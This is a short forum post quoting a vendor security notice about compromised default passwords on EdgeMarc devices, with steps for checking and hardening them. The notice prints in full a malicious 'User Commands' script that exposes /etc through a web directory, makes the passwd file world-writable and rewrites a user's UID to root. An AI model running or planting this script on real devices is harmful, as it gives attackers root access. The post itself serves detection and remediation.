Just got this email, eeek!<p>--- Dear Bandwidth Customers,<p>Bandwidth has discovered an issue wherein EdgeMarc device default passwords may have been compromised on the internet.<p>Any customer who currently owns the EdgeMarc box should immediately change their password.<p>If you are unsure if your specific device has been compromised, you can take the following steps to investigate. However, it is still highly recommended to change the password:<p>In the EdgeMarc GUI, under 'System' click on "Client List". If there are any entries listed other than known and local IP addresses, there is a strong possibility that your device has been compromised. To resolve, remove the offending IP address.<p>Additionally, the following steps should be taken to to ensure a secure device:<p>Disable PPTP (Point-to-Point Protocol) - Under PPTP server > Username, ensure there is no user built unless it is a known user.<p>Disallow WAN clients - Under VoIP ALG, uncheck both the 'allow clients on WAN' option, as well as the 'Enable LLDP' option.<p>Verify no additional scripting has taken place, by looking under 'User Commands'. Specifically, if the following script is present, it will need to be deleted:<p><pre><code> ln -sf /etc /etc/images/m.txt chmod 777 /etc/images/m.txt/config/passwd sed -i -e s'_'"501"'_'"0"'_' /etc/images/m.txt/config/passwd sed -i -e s'_'"501"'_'"0"'_' /etc/images/m.txt/config/passwd sed -i -e s'_'"/etc/images"'_'"/"'_' /etc/images/m.txt/config/passwd </code></pre> ---